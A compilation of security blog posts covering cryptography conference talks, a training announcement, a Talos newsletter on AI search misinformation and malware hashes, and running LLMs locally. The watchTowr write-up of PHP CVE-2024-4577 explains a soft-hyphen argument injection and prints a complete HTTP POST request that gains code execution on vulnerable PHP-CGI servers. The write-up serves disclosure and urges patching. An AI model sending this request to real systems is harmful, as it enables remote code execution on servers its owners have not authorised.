John Schanck’s following talk focused on the “real cost” of the best-known attacks. The NIST security levels I, III and V aim to guide protocol designers to select parameters which offer guarantees of security matching the cost of the best-known attacks against AES-128, 192 and 256 respectively. However, unlike attacks on AES, the dual-lattice attack has an incredibly expensive and memory-hungry sieving step. To make progress on an attack against Kyber and related schemes, one must perform a huge amount of computation before any progress is made on reducing the key-space (compare this to attacking AES where you can simply immediately just start guessing keys). The talk featured fun comparisons — a Moon’s weight of silicon would be needed to fabricate enough memory for the naive implementation of the dual-attack — and really demonstrated how challenging it is to align the real cost of attacking different cryptographic protocols when the attacks themselves are structured so differently at the algorithmic level. The take home message from Schanck’s talk was that when memory cost is taken into account, Kyber 768 should be enough for everyone.

Implementation Footguns for Post-Quantum Cryptography

Nadia Heninger presented a very detailed discussion about potential pitfalls she foresees as issues for post-quantum implementations, primarily based on her experiences with implementations of classical cryptography. She noted that many common classes of implementation pitfalls in classical cryptography are still applicable in PQC settings, including RNG issues, issues with sampling or uniformity of distributions (which may be even trickier in the PQC settings, as many lattice schemes require sampling from multiple distributions), API misuse, and missing validation checks, which can be tricky to enforce via tests. This talk resonated with us, as we have already started seeing some of these issues in the post-quantum projects that we have reviewed so far. Finally, her discussion noted that the increased implementation complexity for PQC schemes may be a blessing in disguise, as the more complicated an algorithm seems, the less likely people are to try to implement it themselves, and instead rely on existing implementations, which may end up helping avoid many of these potential issues at scale!

Making Signal Messenger Post Quantum / Making Encrypted Messaging Post Quantum

Rolfe Schmidt gave a fantastic talk on the upgrade to Signal messenger to begin the inclusion of post-quantum cryptography into the key-agreement stage of the protocol, now known as PQXDH. The talk motivated this change as a protection against “harvest-now, decrypt later” attacks with a design philosophy to change only what strictly needs to be changed to achieve protection against a quantum adversary. Although the key-agreement now includes a hybridized protocol using post-quantum algorithms, the Ratcheting algorithm is still classical only and so the classical guarantees of the Signal protocol are still not quite aligned with the post-quantum guarantees. Ensuring the ratchet is post-quantum secure is a work in progress of the Signal team, where they’re hoping to ensure that the performance of the messaging is not affected by the inclusion of Kyber into the ratcheting mechanism. The design documentation is now available PQXDH Specification

Additionally to the design and implementation of PQXDH, Signal collaborated with academia to produce a formally verified implementation of PQXDH using both ProVerif and CryptoVerif. Signal explained that through the process of formally verifying the protocol, they not only gained confidence in the changes, but verification also highlighted parts of the specification which had been under-described and could have led to attacks if misinterpreted. The process then not only added support for the validity of the design but acted as a guide for a robust description of PQXDH for developers in the future.

Conclusion

Overall, it’s very exciting to be seeing so much movement in the post-quantum real-world applications. We are looking forwards to future PQC updates at RWC, RWPQC and elsewhere, and to reviewing PQC projects that come our way!

– Giacomo Pope and Elena Bakos Lang

Key and Certificate Transparency

Key and certificate transparency was a hot topic at this year’s conference. The Levchin Prize was awarded to the team at Google responsible for “creating and deploying Certificate Transparency at scale”. In addition to the public recognition of what that work has pioneered, three talks were scheduled about different aspects of modern transparency solutions.

Invited talk: Key transparency: introduction, recent results, and open problems

The first talk by Melissa Chase from Microsoft Research delved into recent results and open problems in Key Transparency. In modern encrypted messaging deployments, a service provider is generally responsible for distributing users’ public keys. However, what if a man-in-the-middle attacker were to intercept (and meddle with) the public key of the recipient that a sender is trying to establish a secure communication with? Or worse, what if the server were to get compromised? In an end-to-end encrypted messaging setting, key transparency aims to solve this problem of trusted public key distribution which is often glossed over in academic works.

Until recently, the industry solution to the key transparency question was some form of out-of-band verification, in which users can display a fingerprint corresponding to the chat’s encryption key and compare it with one another. Subsequent deployments have made comparing these traditionally long numerical codes easier by displaying a QR code that can be verified when both users are physically close to each other. These solutions can be slightly tedious for users and the industry has started to deploy large-scale and automatic key transparency solutions based on relatively recent academic works such as CONIKS.

In some of these modern key transparency deployments, service providers provide a publicly accessible key directory which keeps track of users’ public keys. Users can then ensure that the key they hold for a given contact is consistent with the key tracked in the latest version of the online key directory. However, granting people access to public key repositories needs to be done while still maintaining user privacy. Indeed, the deployment of such systems should not make it easier for anyone to be able to track individual users’ actions, for example by figuring out when they refresh their keys (if they get a new device for instance) or by allowing attackers to find out which users are participating in the system by identifying personal information (such as phone numbers or email addresses) in the key directory.

In order to realize the goals outlined above, key transparency deployments make use of a few interesting cryptographic primitives. Service providers generally publish key directory together with a commitment to that directory. In practice, this is usually achieved with a Sparse Merkle Tree, and the commitment is the root of that Merkle Tree. In early academic proposals, the server would post a commitment to the current key directory at regular intervals. New developments (such as SEEMless) are proposing for the server to publish commitments to the incremental changes to the key directory, making the effort to audit the key transparency tree computationally lower (since the entire tree does not have to be recomputed and verified). To safeguard the privacy of users, modern key transparency deployments use Verifiable Random Functions (VRFs), which can be thought of as the public key variant of a hash function. In a VRF, only the private key owner may compute the hash output and its associated proof, but anyone can use the associated public key to verify that the output was calculated correctly. If the leaves of the Merkle tree were computed from the identifying information of users, for example by simply hashing some form of identifier, attackers could easily collect information about users. Using a VRF construction allows to conceal that information, by essentially randomizing the leaf positions in the Merkle tree. Melissa finished rounding up the literature review portion of her talk by presenting OPTIKS, a performant new key transparency solution which focuses on scalability, and which Melissa contributed to.

While many of the technical aspects of key transparency seem to be well ironed-out in theory, there are still a number of open questions and practical aspects that require further engineering efforts. To start, how to effectively instantiate the bulletin board, that publicly accessible key directory that should be efficiently and consistently accessed by users? A second crucial and often overlooked point is that of auditors. One common goal of these key transparency deployments is to provide the ability for auditors to validate the consistency of the key directory. But who are these auditors in practice, and what incentives do they have for performing costly validation work? And if they were to identify any wrongdoing, who would they even report such issues to? A third open question Melissa raised was around the security guarantees of such systems and whether stronger security notions could be obtained. For example, in current schemes, users will detect if a service provider maliciously replaces a user’s key but users themselves can’t prevent it.

WhatsApp Key Transparency

Later that day, Kevin Lewi and Sean Lawlor presented WhatsApp’s Key Transparency solution. Recent updates to WhatsApp added a feature to automatically validate users’ public keys based on a key transparency deployment following many of the concepts presented above. Previously, out-of-band verification used to be available to chat users, but automatic public key verification was recently added. Now, servers publish a commitment to the public key database, and, supported by UI updates in the app, the validity of a contact’s key is automatically checked when users access the “Encryption” menu of their contacts.

The presentation explored the different technical aspects this deployment necessitated, such as the infrastructure challenges to support these updates as well as the frequency at which they need to be updated. The speakers then presented some of the underlying cryptographic constructions used by the deployment. The system uses Sparse Merkle trees and VRFs in a fashion similar to SEEMless, and publishes incremental updates to the key transparency tree in the form of append-only proofs which are about ~200 MB each and are published at approximately 5 minutes intervals.

Kevin and Sean concluded their presentation by advertising the release of their implementation of the auditable key directory (accessible at https://github.com/facebook/akd), which is what WhatsApp uses in production for their key transparency deployment and which can also be used to verify the consistency proofs by external auditors. Members of NCC Group’s Cryptography Services team reviewed the implementation a few months before the conference; the public report can be found on NCC’s research platform: Public Report – WhatsApp Auditable Key Directory (AKD) Implementation Review.

Modern transparency logs

Finally, on the last day of the conference, Filippo Valsorda gave a talk on Modern Transparency Logs. Drawing parallels with key transparency solutions, Filippo kicked off his talk by framing transparency logs as a reusable primitive; a magic global append-only list of entries essentially defined by three fundamental questions: what are the entries, who can add them, and who monitors these entries? Different transparency solutions (such as the Go checksum database which Filippo used repeatedly as example throughout his presentation) are ultimately defined by the answers to these questions.

When building transparency logs solutions, a fundamental type of attacks that must be prevented is the ability to present different views of the system logs to different users, which is known as a split view attack. In a key transparency deployment for example, one could imagine a compromised (or rogue) server advertising a different public key for a target victim. There are a few solutions to circumvent split view attacks. A first one is to ensure local consistency (for example with an append-only log), a second measure is peer-to-peer gossip, where peers communicate amongst themselves to ensure they are being served the same system view, and finally, a third measure is witness cosigning. Witnesses are lightweight, third-party entities responsible for verifying consistency proofs between consecutive Merkle tree roots, and which will cosign that new tree head. Given a network of witnesses, more complex policies can be developed such as requiring a threshold of M-out-of-N signers in order for the tree head to be considered validated.

Filippo then proceeded to advertise a number of specifications and work-in-progress items to support modern transparency logs deployments. The first one being the checkpoint format specification, which is used to interoperate with the witness ecosystem. Checkpoints are essentially signed notes precisely formatted for use in transparency log applications, and which contain the origin of the checkpoint, the tree size and the root hash, and a number of potential co-signatures on that root hash. Recognizing that a checkpoint coupled with an inclusion proof is everything a client needs to verify an inclusion proof offline, Filippo then introduced the concept of “spicy signatures” (🌶️) which are offline verifiable proof of inclusion in a transparency log. He then concluded his talk by presenting a lightweight CLI tool and showing how spicy signatures can be used efficiently in existing deployments, for example by bringing transparency to the Debian package ecosystem in only a few hours.

– Paul Bottinelli

Symmetric Encryption

This year’s symmetric encryption session reinforced the motivations for modernizing our security requirements and design philosophy when it comes to symmetric primitives and modes of operation based on lessons learned and changing requirements over the past 20 years.

Building the Next Generation of AEAD

The symmetric cryptography session was opened by Sanketh Menda, who closed out last year’s event with a presentation on “context-committing” AEADs, or authenticated encryption with associated data, which acknowledges the need for standardized constructions that commit the complete “context” of an AEAD (e.g., the key and nonce). In his update this year, “Building the Next Generation of AEAD“, a broader set of goals was presented:

We sometimes need a fast approach for lightweight devices;
We sometimes need a suitable approach for cloud-scale data;
We sometimes need nonce-misuse resistance;
We sometimes need a nonce-hiding scheme;
And as established last time, we sometimes need context commitment.

And is there one ideal scheme to rule them all? Of course not… However, there may be a new approach to designing a family of schemes that facilitates safer use. To this end, a “flexible AEAD” construction is proposed which presents an implementer with a single set of binary choices corresponding to various security properties, thereby allowing a developer to express their intent, rather than to choose and compose various modes of operation. Sanketh then presents a series of primitives that can be composed in standard ways to achieve these various security goals.

With two excellent back-to-back presentations on the topic, I’m hoping we’ll get to hear a progress update from Sanketh again next year.

What’s wrong with Poly1305?

Jan Gilcher and Jérôme Govinden followed up with a presentation looking back on the development and deployment of Poly1305 and ask a fundamental question: “Given today’s advancements and applications would we still converge to this same design?”. This is initially motivated by observations that Poly1305 sacrifices a degree of security in favor of speed on a 32-bit platform using optimizations in the floating-point unit, whereas most modern platforms are 64-bit and leverage the arithmetic logic unit for optimized Poly1305 computations. So how would we build and optimize a Poly1305-like construction on today’s hardware?

Much like the preceding talk, the authors consider a modular construction for a family of polynomial-based hashes, from which Poly1305 and other similar schemes can be implemented based on a set of input parameters. This allows for the efficient testing and comparison of a broad family of implementations which can be tweaked between favoring security level and speed on a given platform. While such an approach does not outperform a hand-optimized implementation of a specific function, it appears to achieve impressive results based on the flexibility it provides.

Leveraging their new construction, the authors present a variant, Poly1163, which is better optimized for current hardware at a similar security level to Poly1305. Impressively, despite not being hand-optimized at all, this variant outperforms OpenSSL’s Poly1305 implementation. On the other end of the design spectrum, the authors also present Poly1503, which focuses on providing higher bit-security by not clamping inputs in the same manner as Poly1305 without a substantial hit to performance.

I want to encrypt 2^64 bytes with AES-GCM using a single key

Shay Gueron closed out the session with his presentation “I want to encrypt 2^64 bytes with AES-GCM using a single key“, which proposes a new mode of operation for AES called double nonce double key (DNDK), purpose-built to extend AES-GCM to support modern cloud-scale encryption tasks using a single key.

AES-GCM is the most widely used AEAD we encounter and is generally a safe choice for most applications when used correctly. However, GCM has a few well-known limitations: The 12 byte initialization value (IV) limits the number of invocations that can be made with a single key, and GCM out of the box does not provide key commitment, meaning that an attacker can produce a single authenticated ciphertext that decrypts to two different messages under two different nonce+key combinations. It is precisely these two problems that DNDK addresses, while striving to remain as close as possible to the GCM construction itself.

In practice, the concept is simple: If the short IV (nonce) is holding us back, then simply make it bigger, say, double its size. But a “double nonce” isn’t quite enough with GCM, since the first internal step is to hash it down to its original smaller size. Instead, we can use AES itself to build a key derivation function that takes as input the “double nonce” and the encryption key and derives an invocation-specific encryption key. In short, we use our double-nonce-derived-key to encrypt our message, and we have DNDK. And as a bonus, DNDK supports key commitment out of the box as well, as an optional output parameter. This incurs little practical overhead and does not rely on any additional cryptographic primitives to achieve its security.

Shay and friends at Meta have provided an optimized open-source implementation of DNDK-GCM, alongside implementations of AES-GCM and AES-GCM-SIV for comparison. A draft RFC has also been published to guide those wishing to implement DNDK for themselves. The Crypto Services team is proud to have supported the development of the DNDK draft RFC, with team members Gérald Doussot, Thomas Pornin, and Eric Schorn being formally acknowledged in the draft RFC.

– Kevin Henry

Real World Cryptography 2025

We look forward to catching up with everyone next year in Sofia, Bulgaria!

Announcing AI/ML safety and security trainings

Trail of Bits Blog

Trail of Bits

7 June 2024 at 13:00

By Michael D. Brown

We are offering AI/ML safety and security training in summer and fall of this year!

Recent advances in AI/ML technologies opened up a new world of possibilities for businesses to run more efficiently and offer better services and products. However, incorporating AI/ML into computing systems brings new and unique complexities, risks, and attack surfaces. In our experience helping clients safely and securely deploy these systems, we’ve discovered that their security teams have knowledge gaps at this intersection of AI/ML and systems security. We’ve developed our training to help organizations close this gap and equip their teams with the tools to secure their AI/ML operations pipelines and technology stacks.

What you will learn in our training

Our course is tailored for security engineers, ML engineers, and IT staff who need to understand the unique challenges of securing AI/ML systems deployed on conventional computing infrastructure. Over two days, we provide a comprehensive understanding of Al safety and security that goes beyond basic knowledge to practical and actionable insights into these technologies’ specific dangers and risks. Here’s what you will learn through a blend of instructional training and hands-on case studies:

Fundamentals of AI/ML and cybersecurity: In this module, you will learn how AI/ML models/techniques work, what they can and cannot do, and their limitations. We also cover some essential information and software security topics that may be new for ML engineers.
AI/ML tech stacks and operations pipelines: In our second module, you will learn how AI/ML models are selected, configured, trained, packaged, deployed, and decommissioned. We’ll also explore the everyday technologies in the AI/ML stack that professionals use for these tasks.
Vulnerabilities and remediation: In this module, you will learn about the unique attack surfaces and vulnerabilities present in deployed AI/ML systems. You’ll also learn methods for preventing and/or remediating AI/ML vulnerabilities.
Risk assessment and threat modeling: The fourth module covers practical techniques for conducting comprehensive risk assessments and threat models for AI/ML systems. Our holistic approaches will help you evaluate the safety and security risks AI/ML systems may pose to end users in deployed contexts.
Mitigations, controls, and risk reduction: Finally, you will learn how to implement realistic risk mitigation strategies and practical security controls for AI/ML systems. Our comprehensive strategies address the entire AI/ML ops pipeline and lifecycle.

Equip your team to work at the intersection of security and AI/ML

Trail of Bits combines cutting-edge research with practical, real-world experience to advance the state of the art in AI/ML assurance. Our experts are here to help you confidently take your business to the next level with AI/ML technologies. Please contact us today to schedule an on-site (or virtual) training for your team. Individuals interested in this training can also use this form to be notified in the future when we offer public registration for this course!

No Way, PHP Strikes Again! (CVE-2024-4577)

watchTowr Labs - Blog

Aliz Hammond

7 June 2024 at 08:09

No Way, PHP Strikes Again! (CVE-2024-4577)

Orange Tsai tweeted a few hours ago about “One of [his] PHP vulnerabilities, which affects XAMPP by default”, and we were curious to say the least. XAMPP is a very popular way for administrators and developers to rapidly deploy Apache, PHP, and a bunch of other tools, and any bug that could give us RCE in its default installation sounds pretty tantalizing.

Fortunately, for defenders, the bug has only been exploited on Windows-based PHP installations (where PHP is specifically used in CGI mode), under some specific locales:

Chinese (both simplified and traditional), and
Japanese.

However, Orange cautions that other locales could be affected too, and urges users to upgrade to the latest version of PHP, which fixes these bugs (for detail, see their blogpost).

We are keen to point out that we are unsure how common this configuration, or deployment type, is in reality. It is also not our job to find out, outside of our client base. But, regardless, it's an interesting vulnerability due to the root cause. Enjoy with us.

Orange's blogpost, while informative, doesn’t tell us exactly what to do to get that sweet RCE. Unfortunately, the wide range of configuration options makes it difficult to conclusively prove an instance to be vulnerable (or not) at a passive glance and, obviously, because a Windows machine's 'locale' is not typically externally fingerprintable. Because of this, we set about reproducing the bug—if we can exploit it, that’s the best way of proving exploitability, right?

Reading Orange's blog, it is clear that the bug only affects CGI mode of PHP. In this mode, the webserver parses HTTP requests and passes them to a PHP script, which then performs some processing on them. For example, querystrings are parsed and passed to the PHP interpreter on the command line - a request such as as http://host/cgi.php?foo=bar might be executed as php.exe cgi.php foo=bar, for example.

This does, of course, introduce an avenue for command injection, which is why input is carefully handled and sanitized before calling php.exe (cough CVE-2012-1823). However, it seems there is a corner-case which the developers did not account for, which allows an attacker to break out of the command line and supply arguments that are interpreted by PHP itself. This corner-case relates to how unicode characters are converted into ASCII. This is best explained with an example.

Here are two invocations of php.exe, one malicious and one benign. Can you spot the difference?

No, neither can I. Let’s look at then in a hex editor and see if that give us any clue.

Hmm, interesting - here we can see that the first invocation uses a normal dash (0x2D), while the second, it seems, uses something else entirely (a ‘soft hyphen,’ apparently), with the code 0xAD (highlighted). While they both appear the same to you and me, they have vastly different meanings to the OS.

An important detail here is that Apache will escape the actual hyphen - 0x2D - but not the second ‘soft hyphen’, 0xAD. After all, it’s not a real hyphen, right? So there’s no need to escape it… right?

Well. It turns out that, as part of unicode processing, PHP will apply what’s known as a ‘best fit’ mapping, and helpfully assume that, when the user entered a soft hyphen, they actually intended to type a real hyphen, and interpret it as such. Herein lies our vulnerability - if we supply a CGI handler with a soft hyphen (0xAD), the CGI handler won’t feel the need to escape it, and will pass it to PHP. PHP, however, will interpret it as if it were a real hyphen, which allows an attacker to sneak extra command line arguments, which begin with hyphens, into the PHP process.

This is remarkably similar to an older PHP bug (when in CGI mode), CVE-2012-1823, and so we can borrow some exploitation techniques developed for this older bug and adapt them to work with our new bug. A helpful writeup advises that, to translate our injection into RCE, we should aim to inject the following arguments:

-d allow_url_include=1 -d auto_prepend_file=php://input

This will accept input from our HTTP request body, and process it using PHP. Straightforward enough - let’s try a version of this equipped with our 0xAD ‘soft hyphen’ instead of the usual hyphen. Maybe it’s enough to slip through the escaping?

POST /test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: {{host}}
User-Agent: curl/8.3.0
Accept: */*
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Connection: keep-alive

<?php
phpinfo();
?>

Oh joy - we’re rewarded with a phpinfo page, showing us we have indeed achieved RCE.

Conclusions

A nasty bug with a very simple exploit - perfect for a Friday afternoon.

Fortunately, though, patches are available, so we echo Orange Tsai’s advice to upgrade your PHP installation. As always, fantastic work and a salute to Orange Tsai.

Those running in an affected configuration under one of the affected locales - Chinese (simplified, or traditional) or Japanese - are urged to do this as fast as humanely possible, as the bug has a high chance of being exploited en-mass due to the low exploit complexity. Other users are still strongly encouraged to update:

For Windows running in other locales such as English, Korean, and Western European, due to the wide range of PHP usage scenarios, it is currently not possible to completely enumerate and eliminate all potential exploitation scenarios. Therefore, it is recommended that users conduct a comprehensive asset assessment, verify their usage scenarios, and update PHP to the latest version to ensure security.

We won’t duplicate the advisory here, instead, we advise those individuals seeking remediation advice to refer to the comprehensive advisory.

At watchTowr, we believe continuous security testing is the future, enabling the rapid identification of holistic high-impact vulnerabilities that affect your organisation.

It's our job to understand how emerging threats, vulnerabilities, and TTPs affect your organisation.

If you'd like to learn more about the watchTowr Platform, our Attack Surface Management and Continuous Automated Red Teaming solution, please get in touch.

The sliding doors of misinformation that come with AI-generated search results

Cisco Talos

Jonathan Munshaw

6 June 2024 at 18:00

As someone who used to think that his entire livelihood would come from writing, I’ve long wondered if any sort of computer or AI could replace my essential functions at work. For now, it seems there are enough holes in AI-generated language that my ability to write down a complete, accurate and cohesive sentence is not in danger.

But a new wave of AI-generated search results is already turning another crucial part of my job and education on its head: search engine optimization.

Google’s internal AI tool recently started placing its own answers to common queries in Google’s search engine at the top of results pages, above credible or original news sources. At first, this resulted in some hilarious mix-ups, including telling people they could mix glue into pizza sauce to keep cheese adhered to their crust, or that it’s safe to eat a small number of rocks every day as part of a balanced diet.

While hilarious, I’m worried about the potential implications that these features may have in the future on misinformation and fake news on more important or easier-to-believe topics than topping your pizza with glue.

There currently doesn’t seem to be a rhyme or reason to when these types of results do or don’t show up. Google recently announced several changes to its AI-generated search results that now aim to prevent misleading or downright false information on search queries that cover more “important” topics.

“For topics like news and health, we already have strong guardrails in place. For example, we aim to not show AI Overviews for hard news topics, where freshness and factuality are important. In the case of health, we launched additional triggering refinements to enhance our quality protections,” the company said in a blog post.

When testing this out firsthand, I got mixed results. For “hard” news topics, they aren’t displaying AI-generated results at all. For example, when I tried searching for topics like “Who should I vote for in the 2024 presidential election?” and “Does the flu vaccine really work?”

But I did get one of the AI-generated answers when I searched for “When is a fever too high for a toddler?” The displayed answer told me to call a pediatrician if my child is older than three months and has a fever of 102.2 degrees Fahrenheit or higher. Parents’ experience in this realm will differ, but for whatever it’s worth, my daughter’s pediatrician specifically recommended to us not to seek emergency help until a fever has reached 104 degrees or lasts for more than 24 hours even with the use of fever-reducing medicine.

Google’s AI also displayed information when I searched for “Talos cryptocurrency scams” to try and find one of our past blog posts. This summary was accurate, though it may have copy-pasted some text directly from press coverage of the Talos research in question — that’s a whole different issue that the journalist in me is concerned about. What was also interesting to me was that, when I entered the same exact search query the next day, the results page didn’t display this AI Overview.

Bing, Microsoft’s direct Google search engine competitor, is also using its own form of AI-curated content to answer queries.

My concern here is when or if these types of answers are generated for news topics that are already rife with misinformation — think elections, politics, public health and violent crime. Even a slight slip up from one of these language models, such as getting a certain number incorrect or displaying a link from a known fake news or satire site, could have major consequences for spreading disinformation.

On last week’s episode of Talos Takes, Martin Lee and I discussed how the most convincing forms of disinformation and fake news are short, punchy headlines or social media posts. The average person is not as media literate as we’d like to think, and seeing a quick and easy summary of a topic after they type an answer into a search engine is likely going to be good enough for most users on the internet. It’s usually going above and beyond just to ask someone to click through to the second page of Google’s search results.

AI’s integration into search engines could change the way many of us interact with the internet — I’ve been used to using Google’s search engine as my homepage since I was in middle school. At the risk of sounding hyperbolic, I don’t want to assume that this is going to be an issue, perhaps companies will sort all the issues out, or AI overviews won’t come for more serious news topics than general life questions. But so far, the results shouldn’t inspire much confidence.

The one big thing

Cisco Talos recently discovered a new threat actor called “LilacSquid” targeting the IT and pharmacy sectors, looking to maintain persistent access on victim’s networks. This campaign leverages vulnerabilities in public-facing application servers and compromised remote desktop protocol (RDP) credentials to orchestrate the deployment of a variety of open-source tools, such as MeshAgent and SSF, alongside customized malware, such as "PurpleInk," and two malware loaders we are calling "InkBox" and "InkLoader.”

Why do I care?

LilacSquid’s victimology includes a diverse set of victims consisting of information technology organizations building software for the research and industrial sectors in the United States, organizations in the energy sector in Europe and the pharmaceutical sector in Asia indicating that the threat actor (TA) may be agnostic of industry verticals and trying to steal data from a variety of sources. Talos assesses with high confidence that this campaign has been active since at least 2021. Multiple tactics, techniques, tools and procedures (TTPs) utilized in this campaign bear some overlap with North Korean APT groups, such as Andariel and its parent umbrella group, Lazarus — these are some of the most active threat actors currently on the threat landscape.

So now what?

LilacSquid commonly gains access to targeted victims by exploiting vulnerable web applications, so as always, it’s important to patch any time there’s a vulnerability on your network. Talos has also released new Snort rules, ClamAV signatures and other Cisco Security detection that can detect LilacSquid’s activities and the malware they use.

Top security headlines of the week

Several hospitals in London are still experiencing service disruptions after a cyber attack targeting a third-party pathology services provider. Some of the most high-profile healthcare facilities in Britain’s capital had to cancel or reschedule appointments or redirect patients to other hospitals. Lab services provider Synnovis confirmed the ransomware attack in a statement on Tuesday and said it was working with the U.K.’s National Health Service to minimize the effects on patients. This latest ransomware attack is illustrative of the larger cybersecurity issues facing the NHS, which manages a massive network of hospitals across the U.K. and has more than 1.7 million employees. In June 2023, the BlackCat ransomware group stole sensitive data from a few NHS hospitals and posted it on a data leak site. And just last month, a different group threatened to leak data from an NHS board overseeing a region of Scotland. The incident also forced other hospitals in the area to expand their capacities and operations to take on more patients, potentially stretching their resources thin. As of Wednesday afternoon, there was no timetable available for the resolution of these issues. (The Record by Recorded Future, Bloomberg)

International law enforcement agencies teamed up for what they are calling one of the largest botnet disruptions ever. U.S. prosecutors announced last week that it dismantled a botnet called “911 S5,” arresting and charging its administrator as part of a global effort. The botnet reportedly infected more than 19 million residential IP addresses, using the compromised devices to mask cybercriminal activity for anyone who paid for access to the botnet. Adversaries had used 911 S5 for a range of malicious activities, including bomb threats, the distribution of child abuse imagery and the creation of fraudulent COVID-19 relief payments totaling more than $6 billion. The administrator, a People’s Republic of China native, is charged with creating and disseminating “malware to compromise and amass a network of millions of residential Windows computers worldwide,” according to a U.S. Department of Justice press release. The botnet was allegedly active between 2014 and July 2022. 911 built its network by offering a phony “free” VPN service to users, allowing them to browse the web while redirecting their IP address and protecting their privacy. However, the VPN service turned the target’s device into a traffic replay for the malicious 911 S5 customers. (U.S. Department of Justice, Krebs on Security)

In a separate law enforcement campaign called “Operation Endgame,” law enforcement agencies from several countries disrupted droppers belonging to several malware families. Targets included IcedID, SystemBC, Pikabot, Smokeloader, Bumblebee and Trickbot. The coordinated effort between multiple European countries and the U.S. FBI led to four arrests of alleged malware operators and the seizure of more than 100 servers and 2,000 attacker-controlled domains. Eight Russian nationals have also been added to the list of Europe's most wanted fugitives for their alleged roles in developing the botnets behind Smokeloader and TrickBot, two of the most infamous malware families. Law enforcement agencies are also zeroing in on the person they believe to be behind the Emotet botnet, nicknamed “Odd.” "We have been investigating you and your criminal undertakings for a long time and we will not stop here," Operation Endgame warned in a video to threat actors. The investigation also found that the botnet operators had generated more than 69 million Euros by renting out their infrastructure to other threat actors so they could deploy ransomware. (Dark Reading, Europol)

Can’t get enough Talos?

Upcoming events where you can find Talos

AREA41 (June 6 – 7)

Zurich, Switzerland

Gergana Karadzhova-Dangela from Cisco Talos Incident Response will highlight the primordial importance of actionable incident response documentation for the overall response readiness of an organization. During this talk, she will share commonly observed mistakes when writing IR documentation and ways to avoid them. She will draw on her experiences as a responder who works with customers during proactive activities and actual cybersecurity breaches.

Cisco Connect U.K. (June 25)

London, England

In a fireside chat, Cisco Talos experts Martin Lee and Hazel Burton discuss the most prominent cybersecurity threat trends of the near future, how these are likely to impact UK organizations in the coming years, and what steps we need to take to keep safe.

BlackHat USA (Aug. 3 – 8)

Las Vegas, Nevada

Defcon (Aug. 8 – 11)

Las Vegas, Nevada

BSides Krakow (Sept. 14)

Krakow, Poland

Most prevalent malware files from Talos telemetry over the past week

SHA 256: 9be2103d3418d266de57143c2164b31c27dfa73c22e42137f3fe63a21f793202
MD5: e4acf0e303e9f1371f029e013f902262
Typical Filename: FileZilla_3.67.0_win64_sponsored2-setup.exe
Claimed Product: FileZilla
Detection Name: W32.Application.27hg.1201

SHA 256: 0e2263d4f239a5c39960ffa6b6b688faa7fc3075e130fe0d4599d5b95ef20647
MD5: bbcf7a68f4164a9f5f5cb2d9f30d9790
Typical Filename: bbcf7a68f4164a9f5f5cb2d9f30d9790.vir
Claimed Product: N/A
Detection Name: Win.Dropper.Scar::1201

SHA 256: 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1
MD5: 3e10a74a7613d1cae4b9749d7ec93515
Typical Filename: IMG001.exe
Claimed Product: N/A
Detection Name: Win.Dropper.Coinminer::1201

SHA 256: a024a18e27707738adcd7b5a740c5a93534b4b8c9d3b947f6d85740af19d17d0
MD5: b4440eea7367c3fb04a89225df4022a6
Typical Filename: Pdfixers.exe
Claimed Product: Pdfixers
Detection Name: W32.Superfluss:PUPgenPUP.27gq.1201

SHA 256: c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0
MD5: 8c69830a50fb85d8a794fa46643493b2
Typical Filename: AAct.exe
Claimed Product: N/A
Detection Name: PUA.Win.Dropper.Generic::1201

How to Train Your Large Language Model

Blog - Atredis Partners

Chris Bellows

6 June 2024 at 19:09

Large Language Models (LLM) such as those provided by OpenAI (GPT3/4), Google (Gemini), Anthropic (Claude) can be a useful tool to include when conducting security audits or reverse engineering; however, one of the main downsides of using these tools is the data you are reviewing is processed server side, meaning any data analyzed by the tool must be uploaded/sent to the server.

While these services provide privacy policies that may double pinky swear your data is safe, and they will not use it for training if you opt-out, as a consultant we are often working with a client's data that is under NDA, preventing the usage of these services. Outside of cases where an NDA is in place, a policy won't protect you from platform bugs or provider monitoring that may leak your data or research. We have already seen an example of this with OpenAI publicly confirming they monitor the usage of its service to identify potentially 'evil' usage by bad-actors - https://openai.com/index/disrupting-malicious-uses-of-ai-by-state-affiliated-threat-actors/

Besides privacy concerns, a few other disadvantages of using a hosted service are:

service may go away (outage/sale)
modified to prevent malicious use (RE/Exploitation often flagged)
- potentially resulting monitoring/account ban
costs (usually per-token)

Given these hurdles, smaller models that run locally on your own hardware are a promising path to leveraging a LLM without compromising your privacy or an NDA.

Comparisons

To be fair, it is worth pointing out the differences between the hosted LLM offerings and the local versions. The big difference is going to be the size of the training dataset and model parameter size - this can be thought of as the amount of 'knowledge' or data stored within the model, more parameters is going to indicate more 'knowledge' it can reference based on your input. OpenAI does not provide the details of GPT4, GPT3 was +100-billion parameters while GPT3.5's size has not been disclosed, speculation/research/guessing indicates it is much smaller (~22b parameters) - due to fine-tuning and/or other 'secret sauce'. It is speculated that the original GPT4 is in the +100-trillion parameter range. On the other hand, a local model that will run on consumer hardware is going to be in the 2b-70b range, this obviously is a clear disadvantage and is going to result in lower quality responses when compared to a hosted service.

Run Whatcha Brung

The actual size of the model you can run is going to be dependent on how much memory you have available - a decent rule is that the model will occupy 2x the memory of the parameter size: 2b/4gb, 7b/14gb, etc. The main exception to this rule is models that have been modified to use smaller values for stored parameters (quantization). Normally a model will use 16-bit floating point values for parameters; however, by clipping these values to smaller units (8/4-bit) the size can be reduced with minimal to no quality drop, resulting in lower memory usage and faster results.

When it comes to actual speed of results, it comes down to where you are running your inference. The best results are going to come from a recent GPU, ideally 24GB VRAM, meaning NVIDIA 3090 or 4090 - a used 3090 is best for the money for a turnkey solution. The next best setup is going to be an Apple Silicon (arm) Macbook/Studio/etc. - while this may be contentious, it is difficult to match the performance due to the shared memory architecture as you are able to use system ram for compute without a performance hit. While it is possible to run these models from system ram using the CPU on x86/64 machines, there is a performance hit compared to the previous options and results are most likely going to be slow - of course there are caveats here, as with anything you will find cases where highly tuned setups can perform well, in this case we are just considering ease of use and time to get started.

Execution

There are quite a few ways to run models locally, in this case I am using Ollama as it just-works and is fairly batteries-included for most use cases. Ollama provides installers for OSX, Linux, and Windows. Downloading and running a local model is as easy as executing the command ollama run with a model from the registry, the required files will automatically download and enter an interactive 'chat' shell:

% ollama run phi3
pulling manifest
